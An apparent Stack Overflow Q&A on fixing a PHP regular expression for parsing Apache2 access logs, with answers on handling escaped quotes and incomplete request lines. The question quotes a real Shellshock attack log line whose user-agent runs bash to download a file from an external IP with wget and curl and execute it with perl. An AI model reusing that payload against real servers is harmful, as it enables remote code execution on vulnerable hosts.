0

I want to parse Apache2 log files and found an otherwise good regexp here to do so, using the regexp below:

/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/

The problem is this regexp predates shellshock hack bots, and the string returns no match against a user agent string like sent below:

Bad example bash attack:

199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""

Here is a regular log line:

157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

Can someone provide an updated regexp that handles hacked user agent string, or suggest an alternative two step php - regexp to be more hack proof? I can see the specific problem relates to handling \" and it appears the last regep can be replaced with "(.*)"$ but I'd like an expert opinion ... Thanks.

Charlie
  • 128
  • 5
  • Another log line that doesn't work with the original or the revised regexp: `104.192.0.20 - - [20/Jan/2015:15:40:55 -0500] "-" 408 0 "-" "-"` – Charlie Jan 23 '15 at 17:57
  • @Geohut: OP is not having problems with shellshock, or with a vulnerable bash. The problem is parsing Apache logs which contain (presumably unsuccessful) attack attempts. – rici Jan 23 '15 at 19:38

1 Answers1

0

Change both instances of

"([^"]*)"

to

"((?:[^"]|\\")*)"

That will allow \" within quoted strings.

By the way, it is not necessary to backslash-escape quotes in a regex, nor is it necessary to backslash-escape ] in a character class when it is the first character in the class. So you could remove some redundant backslashes. And personally, I'd use the same quote exclusion syntax instead of a non-greedy match.

Finally, as is observed in a comment, the parse of the request will fail in the case that the request is incomplete. If the only incomplete request line is a missing indicator ("-"), then you could recognize these by making most of the request optional, leaving the - as the "method".

So I'd suggest the following:

/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] "(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) "((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$/
rici
  • 234,347
  • 28
  • 237
  • 341
  • Thanks - this does seem to work on the bash quoting example but fails on the line where there is a missing GET string ( "-" ). I can solve that by taking the (\S+) pieces out of the request, though that sacrifices the simple parsing of request and url with a single regexp. Maybe I'll fall back to detecting a failure to regexp parse and logging the IP and date/time with the failed log line for now. – Charlie Jan 23 '15 at 18:44
  • 1
    @Charlie: Answer updated. For future reference, please don't put additional requirements for your questions in comments to the question. Many people don't read the comments. Instead, edit your question with the additional clarifications. But try to avoid completely changing the question with an edit; it may be better to ask another question. Remember that the point of SO is to create a kind of encyclopedia of good questions with good answers. – rici Jan 23 '15 at 19:35